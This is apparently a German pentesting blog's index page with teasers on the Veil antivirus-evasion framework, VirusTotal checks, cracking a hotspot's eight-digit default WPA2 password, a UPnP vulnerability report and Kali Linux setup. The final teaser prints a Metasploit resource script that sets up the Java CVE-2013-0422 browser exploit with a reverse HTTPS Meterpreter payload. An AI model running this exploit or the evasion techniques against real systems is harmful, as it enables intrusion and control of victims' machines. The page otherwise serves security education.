Veil Präsentation während der ShmooCon 2014

Christopher Truncer und Will Schroeder hielten diesen interessanten Vortrag während der ShmooCon 2014 in Washington, DC.  Sie präsentierten das Veil-Framework und das neue Payload Delivery Tool “Veil-Catapult”. Der Vortrag beinhaltete zwei Live-Demos. [youtube AKml11-XfTA 548 365]      

Metasploit Virustotal Checks

Das Metasploit-Framework und die Software Veil haben nun Möglichkeiten implementiert, selbst erstellte oder mit Schadcode versehene Dateien über den Dienst „VirusTotal“ zu untersuchen. Durch diesen Test kann geprüft werden, ob die Virenschutzprogramme der verschiedenen Hersteller die übersandte Datei als Malware einstuft oder nicht.

Die Abfrage ist unter Voraussetzung einer Internetverbindung über die Kommandozeile möglich. Dabei nutzen beide Programme die API von VirusTotal. Dabei ist eine unterschiedliche Herangehensweise bei der Übermittlung von Daten an diesen Dienst zu beobachten.

Das Metasploit-Framework übermittelt die gesamte Datei an VirusTotal und erhält eine konkrete Aussage, ob in der übermittelten Software Schadcode erkannt wurde und wie diese vom jeweiligen Hersteller bezeichnet wird. In den Nutzerbedingungen von VirusTotal ist festgelegt, dass sie diese Dateien weitergeben und verwenden dürfen.  Es ist somit nicht auszuschließen, dass Daten an die jeweiligen Firmen zur weiteren Analyse weitergeleitet werden.

Weiterlesen

ATT Mobile Hotspot WPA Cracking

Vor nicht zu langer Zeit hatte ich die Gelegenheit einen mobilen Hotspot von AT&T zu testen. Er ist mit einer SIM-Karte ausgestattet. Der Nutzer ist somit in der Lage, die über WLAN mit dem  Hotspot verbundenen Geräte an das schnelle mobile Internet (LTE) anzubinden.

Das Gerät wird standartmäßig mit einer WPA2-Verschlüsselung ausgeliefert. Das generierte Passwort bestand allerding nur aus acht Ziffern. Mir fiel auf, dass kaum ein Nutzer diese Standartwerte änderte und fast alle mit dem werkseitig generierten Passwort ins Internet gingen.

Für mich stellte sich nun die Frage,  mit welcher Sicherheit die Nutzer nun unterwegs sind und wie lange ein Angreifer braucht, um dieses Passwort herauszubekommen.

Weiterlesen

Mit Veil Virenschutz umgehen

Die Entwickler um Chris Truncer haben es sich zur Aufgabe gemacht,  Virenschutz zu umgehen.  Dies soll Penetrationstestern helfen ihre Tools und Programme einzusetzen, ohne  dass  das sie daran von auf dem Client PC  installierten Virenschutzprogramme  gehindert werden. Dies hilft die eigentlichen Sicherheitslücken auf Systemen und in Netzwerken zu erkennen und zu eliminieren.

Mit dem  Metasploit-Framework sind Penetrationstester in der Lage, Payloads zu erzeugen und Exploits zu entwickeln. In der Vergangenheit wurden aber die mit diesem Framework erzeugten Payloads von den diversen Virenschutzprogrammen nach und nach erkannt.

Mit der  Software Veil (engl. für Schleier) ist der Anwender nun in der Lage, Payloads in Form von Skripten oder ausführbaren Dateien zu erzeugen, die von Virenschutzprogrammen nicht mehr so leicht zu erkennen sind. Die Entwickler finden immer neuere Techniken, um ihr Ziel durchzusetzen.

Die Software ist in Python programmiert  und kann in Kali Linux genutzt werden. Der nachfolgende Beitrag erklärt die Einrichtung der aktuellen Version. Außerdem werden   Payloads erstellt, die dann auf einem Windows 7 PC mit installiertem Virenschutz (McAffee) getestet werden.

Weiterlesen

Kali-Linux unter VirtualBox einrichten

Kali-Linux lässt sich problemlos unter VirtualBox einrichten. Bei der Installation der Guest-Edition muss man allerdings einiges beachten. Zunächst richtet man Kali-Linux unter VirtualBox als neue virtuelle Maschine ein. Eine gute Anleitung findet man z.B. hier.

Bei der Installation wird man aufgefordert das root Passwort einzugeben. Nach dem Neustart meldet man sich als root an und sollte als erstes die Guest-Edition von VirtualBox einrichten. Hier geht man wie folgt vor.

Starten sie zunächst die Gastinstallation mittels klick auf  Ändern – Gasterweiterung installieren.  Nun wird die notwendige Software  als CD-Image bereitgestellt.

Weiterlesen

Kali-Linux ausgeliefert

Offensive Security hat heute den BackTrack Nachfolger Kali-Linux vorgestellt. Damit wurde ein Neustart vollzogen, der mit Altlasten aufräumt und eine  effektive und flexible Nutzung in der Zukunft gewährleistet. Während  BackTrack  auf Ubuntu aufgebaut war, nutzt  Kali-Linux  nun Debian.  Im Gegensatz zum Vorgänger ist Kali-Linux strukturiert aufgebaut. Dies erleichtert die Pflege des Systems und ermöglicht eine flexible Zusammenstellung der benötigten Komponenten. Der Nutzer  kann aus mehreren Desktop-Umgebungen (z.B. KDE, LXDE, XFCE)  auswählen und ist somit in … Weiterlesen

Schwachstelle im UPnP-Dienst

Üblicherweise wird Universal Plug and Play (UPnP) zur Ansteuerung von Geräten im lokalen Netzwerk genutzt.  Dies können sowohl Audio-Geräte als auch Drucker, Router, NAS-Geräte bzw. Haushaltssteuerungen sein.  Mit diesem Protokoll lassen sich Steuerbefehle über ein IP-basierendes Netzwerk austauschen und somit die Kommunikation zwischen den einzelnen Geräten komfortabel und ohne großen Konfigurationsaufwand gestalten.

Normalerweise stellt dieser Dienst in einem lokalen Netzwerk kein Problem dar. Problematisch wird es aber, wenn diese Geräte nicht nur auf Anfragen aus dem lokalen Netz antworten, sondern auch aus dem Internet.

Rapid7 fand bei eigenen Recherchen heraus, dass über 80 Millionen Geräten (sie sprechen von einzelnen IP-Adressen) über das Internet erreichbar sind. Betroffen sind davon laut  Rapid7 Geräte von über 1500 Herstellern.  Darunter fallen z.B. D-Link, Fujitsu, Huawei, Logitech, Netgear, Siemens, Sony, TP-Link und Zyxel. Bislang sollen Geräte von AVM (z.B. FritzBox) und der Deutschen Telekom nicht betroffen sein.

Somit bekommen potenzielle Angreifer die Gelegenheit, vorhandene Schwachstellen der Firmware der einzelnen Geräte auszunutzen und so möglicherweise in das lokale Netzwerk einzudringen.

Etwa 40 bis 50 Millionen Geräte sollen nach Rapid7 mit UPnP-Schwachstellen behaftet sein.  Viele wurden schon in den letzten 12 Jahren entdeckt und diskutiert. Trotzdem setzen viele Hersteller die fehlerhafte Software als Firmware in ihren Produkten ein bzw. empfanden es nicht als notwendig, die Fehler zu beseitigen.

Weiterlesen

Backtrack wird zu Kali-Linux

Backtrack wurde ursprünglich für den persönlichen Gebrauch der Mitarbeiter von Offensive Security entwickelt. Mittlerweile hat die Software einen hohen Verbreitungsgrad erreicht. Pentester auf der ganzen Welt nutzen dieses erstklassige Werkzeug. Schon vor etwa einem Jahr haben aber die Entwickler von Backtrack sich darüber Gedanken gemacht, wie sie die Zukunft dieser auf Ubuntu-Linux basierenden Software gestalten können. Dazu wurde eine lange Liste mit Feature erstellt, die nach und nach in eine neue Distribution eingearbeitet werden sollten. … Weiterlesen

Java Schwachstelle CVE-2013-0422

Für die neuentdeckte  Java-Schwachstelle (bis Java-Version 7 Update 10) hat Rapid7 ein Modul entwickelt, das ich in diesem Blog kurz vorstellen will. Der Exploit sollte auf den gängigen Betriebssystemen (Windows, Linux und OSX)  funktionieren. Als Payload habe ich java/meterpreter/reverse_https verwendet. Zur einfacheren Handhabung kann man sich folgende Resource-Datei erstellen. use exploit/multi/browser/java_jre17_jmxbean set srvport 80 set uripath / set payload java/meterpreter/reverse_https set lport 443 set lhost 192.168.111.215 show options Der Exploit ist nicht für ältere Versionen von Java … Weiterlesen

Diese Seite verwendet Cookies, um die Nutzerfreundlichkeit zu verbessern. Mit der weiteren Verwendung stimmst du dem zu.

Datenschutzerklärung